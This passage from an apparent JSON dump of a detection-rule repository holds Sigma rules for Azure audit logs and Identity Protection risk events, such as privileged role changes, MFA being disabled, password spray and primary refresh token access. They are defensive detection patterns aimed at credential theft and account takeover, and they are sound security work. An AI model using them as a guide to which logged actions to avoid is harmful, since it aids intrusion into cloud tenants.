    "content": "title: Azure Domain Federation Settings Modified\nid: 352a54e1-74ba-4929-9d47-8193d67aba1e\nstatus: test\ndescription: Identifies when an user or application modified the federation settings on the domain.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes\nauthor: Austin Songer\ndate: 2021-09-06\nmodified: 2022-06-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        ActivityDisplayName: Set federation settings on domain\n    condition: selection\nfalsepositives:\n    - Federation Settings being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\n\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml",
    "content": "title: User Added To Group With CA Policy Modification Access\nid: 91c95675-1f27-46d0-bead-d1ae96b97cd3\nstatus: test\ndescription: Monitor and alert on group membership additions of groups that have CA policy modification access\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'\ndate: 2022-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Add member from group\n    condition: selection\nfalsepositives:\n    - User removed from the group is approved\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml",
    "content": "title: User Removed From Group With CA Policy Modification Access\nid: 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c\nstatus: test\ndescription: Monitor and alert on group membership removal of groups that have CA policy modification access\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access\nauthor: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'\ndate: 2022-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548\n    - attack.t1556\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Remove member from group\n    condition: selection\nfalsepositives:\n    - User removed from the group is approved\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml",
    "content": "title: Guest User Invited By Non Approved Inviters\nid: 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9\nstatus: test\ndescription: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-10\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Invite external user\n        Status: failure\n    condition: selection\nfalsepositives:\n    - A non malicious user is unaware of the proper process\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_guest_to_member.yml",
    "content": "title: User State Changed From Guest To Member\nid: 8dee7a0d-43fd-4b3c-8cd1-605e189d195e\nstatus: test\ndescription: Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-06-30\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'UserManagement'\n        OperationName: 'Update user'\n        properties.message: '\"displayName\":\"UserType\",\"oldValue\":\"[\\\"Guest\\\"]\",\"newValue\":\"[\\\"Member\\\"]\"'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml",
    "content": "title: PIM Approvals And Deny Elevation\nid: 039a7469-0296-4450-84c0-f6966b16dc6d\nstatus: test\ndescription: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-09\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Request Approved/Denied\n    condition: selection\nfalsepositives:\n    - Actual admin using PIM.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml",
    "content": "title: PIM Alert Setting Changes To Disabled\nid: aeaef14c-e5bf-4690-a9c8-835caad458bd\nstatus: test\ndescription: Detects when PIM alerts are set to disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-09\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Disable PIM Alert\n    condition: selection\nfalsepositives:\n    - Administrator disabling PIM alerts as an active choice.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_pim_change_settings.yml",
    "content": "title: Changes To PIM Settings\nid: db6c06c4-bf3b-421c-aa88-15672b88c743\nstatus: test\ndescription: Detects when changes are made to PIM roles\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-09\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Update role setting in PIM\n    condition: selection\nfalsepositives:\n    - Legit administrative PIM setting configuration changes\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml",
    "content": "title: User Added To Privilege Role\nid: 49a268a4-72f4-4e38-8a7b-885be690c5b5\nstatus: test\ndescription: Detects when a user is added to a privileged role.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-06\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add eligible member (permanent)\n            - Add eligible member (eligible)\n    condition: selection\nfalsepositives:\n    - Legtimate administrator actions of adding members from a role\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml",
    "content": "title: Bulk Deletion Changes To Privileged Account Permissions\nid: 102e11e3-2db5-4c9e-bc26-357d42585d21\nstatus: test\ndescription: Detects when a user is removed from a privileged role. Bulk changes should be investigated.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Remove eligible member (permanent)\n            - Remove eligible member (eligible)\n    condition: selection\nfalsepositives:\n    - Legtimate administrator actions of removing members from a role\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml",
    "content": "title: Privileged Account Creation\nid: f7b5b004-dece-46e4-a4a5-f6fd0e1c6947\nstatus: test\ndescription: Detects when a new admin is created.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton\ndate: 2022-08-11\nmodified: 2022-08-16\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message|contains|all:\n            - Add user\n            - Add member to role\n        Status: Success\n    condition: selection\nfalsepositives:\n    - A legitimate new admin account being created\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml",
    "content": "title: Azure Subscription Permission Elevation Via AuditLogs\nid: ca9bf243-465e-494a-9e54-bf9fc239057d\nstatus: test\ndescription: |\n    Detects when a user has been elevated to manage all Azure Subscriptions.\n    This change should be investigated immediately if it isn't planned.\n    This setting could allow an attacker access to Azure subscriptions in your environment.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation\nauthor: Austin Songer @austinsonger\ndate: 2021-11-26\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'Administrative'\n        OperationName: 'Assigns the caller to user access admin'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_tap_added.yml",
    "content": "title: Temporary Access Pass Added To An Account\nid: fa84aaf5-8142-43cd-9ec2-78cfebf878ce\nstatus: test\ndescription: Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-10\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message: Admin registered security info\n        Status: Admin registered temporary access pass method for user\n    condition: selection\nfalsepositives:\n    - Administrator adding a legitimate temporary access pass\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml",
    "content": "title: User Risk and MFA Registration Policy Updated\nid: d4c7758e-9417-4f2e-9109-6125d66dabef\nstatus: test\ndescription: |\n    Detects changes and updates to the user risk and MFA registration policy.\n    Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy\n    - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities\nauthor: Harjot Singh (@cyb3rjy0t)\ndate: 2024-08-13\ntags:\n    - attack.persistence\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        LoggedByService: 'AAD Management UX'\n        Category: 'Policy'\n        OperationName: 'Update User Risk and MFA Registration Policy'\n    condition: selection\nfalsepositives:\n    - Known updates by administrators.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml",
    "content": "title: Multi Factor Authentication Disabled For User Account\nid: b18454c8-0be3-41f7-86bc-9c614611b839\nstatus: test\ndescription: |\n    Detects changes to the \"StrongAuthenticationRequirement\" value, where the state is set to \"0\" or \"Disabled\".\n    Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.\nreferences:\n    - https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/\nauthor: Harjot Singh (@cyb3rjy0t)\ndate: 2024-08-21\ntags:\n    - attack.credential-access\n    - attack.persistence\nlogsource:\n    product: azure\n    service: auditlogs\n    definition: 'Requirements: The TargetResources array needs to be mapped accurately in order for this rule to work'\ndetection:\n    selection:\n        LoggedByService: 'Core Directory'\n        Category: 'UserManagement'\n        OperationName: 'Update user'\n        TargetResources.ModifiedProperties.DisplayName: 'StrongAuthenticationRequirement'\n        TargetResources.ModifiedProperties.NewValue|contains: \"State\\\":0\"\n    condition: selection\nfalsepositives:\n    - Legitimate authorized activity.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/audit_logs/azure_user_password_change.yml",
    "content": "title: Password Reset By User Account\nid: 340ee172-4b67-4fb4-832f-f961bdc1f3aa\nstatus: test\ndescription: Detect when a user has reset their password in Azure AD\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: YochanaHenderson, '@Yochana-H'\ndate: 2022-08-03\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.credential-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        Category: 'UserManagement'\n        Status: 'Success'\n        Initiatedby: 'UPN'\n    filter:\n        Target|contains: 'UPN'\n        ActivityType|contains: 'Password reset'\n    condition: selection and filter\nfalsepositives:\n    - If this was approved by System Administrator or confirmed user action.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_token.yml",
    "content": "title: Anomalous Token\nid: 6555754e-5e7f-4a67-ad1c-4041c413a007\nstatus: test\ndescription: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow'\ndate: 2023-08-07\ntags:\n    - attack.t1528\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'anomalousToken'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml",
    "content": "title: Anomalous User Activity\nid: 258b6593-215d-4a26-a141-c8e31c1299a6\nstatus: test\ndescription: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.privilege-escalation\n    - attack.t1098\n    - attack.persistence\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'anomalousUserActivity'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_activity.yml",
    "content": "title: Activity From Anonymous IP Address\nid: be4d9c86-d702-4030-b52e-c7859110e5e8\nstatus: test\ndescription: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'riskyIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml",
    "content": "title: Anonymous IP Address\nid: 53acd925-2003-440d-a1f3-71a5253fe237\nstatus: test\ndescription: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.\nreferences:\n    - https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address\nauthor: Gloria Lee, '@gleeiamglo'\ndate: 2023-08-22\ntags:\n    - attack.t1528\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'anonymizedIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml",
    "content": "title: Atypical Travel\nid: 1a41023f-1e70-4026-921a-4d9341a9038e\nstatus: test\ndescription: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'unlikelyTravel'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml",
    "content": "title: Impossible Travel\nid: b2572bf9-e20a-4594-b528-40bde666525a\nstatus: test\ndescription: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'impossibleTravel'\n    condition: selection\nfalsepositives:\n    - Connecting to a VPN, performing activity and then dropping and performing additional activity.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml",
    "content": "title: Suspicious Inbox Forwarding Identity Protection\nid: 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d\nstatus: test\ndescription: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1114.003\n    - attack.collection\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'suspiciousInboxForwarding'\n    condition: selection\nfalsepositives:\n    - A legitimate forwarding rule.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml",
    "content": "title: Suspicious Inbox Manipulation Rules\nid: ceb55fd0-726e-4656-bf4e-b585b7f7d572\nstatus: test\ndescription: Detects suspicious rules that delete or move messages or folders are set on a user's inbox.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1140\n    - attack.defense-evasion\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'mcasSuspiciousInboxManipulationRules'\n    condition: selection\nfalsepositives:\n    - Actual mailbox rules that are moving items based on their workflow.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml",
    "content": "title: Azure AD Account Credential Leaked\nid: 19128e5e-4743-48dc-bd97-52e5775af817\nstatus: test\ndescription: Indicates that the user's valid credentials have been leaked.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1589\n    - attack.reconnaissance\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'leakedCredentials'\n    condition: selection\nfalsepositives:\n    - A rare hash collision.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address.yml",
    "content": "title: Malicious IP Address Sign-In Failure Rate\nid: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd\nstatus: test\ndescription: Indicates sign-in from a malicious IP address based on high failure rates.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1090\n    - attack.command-and-control\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'maliciousIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml",
    "content": "title: Malicious IP Address Sign-In Suspicious\nid: 36440e1c-5c22-467a-889b-593e66498472\nstatus: test\ndescription: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1090\n    - attack.command-and-control\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'suspiciousIPAddress'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml",
    "content": "title: Sign-In From Malware Infected IP\nid: 821b4dc3-1295-41e7-b157-39ab212dd6bd\nstatus: test\ndescription: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1090\n    - attack.command-and-control\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'malwareInfectedIPAddress'\n    condition: selection\nfalsepositives:\n    - Using an IP address that is shared by many users\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml",
    "content": "title: New Country\nid: adf9f4d2-559e-4f5c-95be-c28dff0b1476\nstatus: test\ndescription: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'newCountry'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml",
    "content": "title: Password Spray Activity\nid: 28ecba0a-c743-4690-ad29-9a8f6f25a6f9\nstatus: test\ndescription: Indicates that a password spray attack has been successfully performed.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1110\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'passwordSpray'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml",
    "content": "title: Primary Refresh Token Access Attempt\nid: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1\nstatus: test\ndescription: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1528\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'attemptedPrtAccess'\n    condition: selection\nfalsepositives:\n    - This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml",
    "content": "title: Suspicious Browser Activity\nid: 944f6adb-7a99-4c69-80c1-b712579e93e6\nstatus: test\ndescription: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'suspiciousBrowser'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml",
    "content": "title: Azure AD Threat Intelligence\nid: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba\nstatus: test\ndescription: Indicates user activity that is unusual for the user or consistent with known attack patterns.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'investigationsThreatIntelligence'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml",
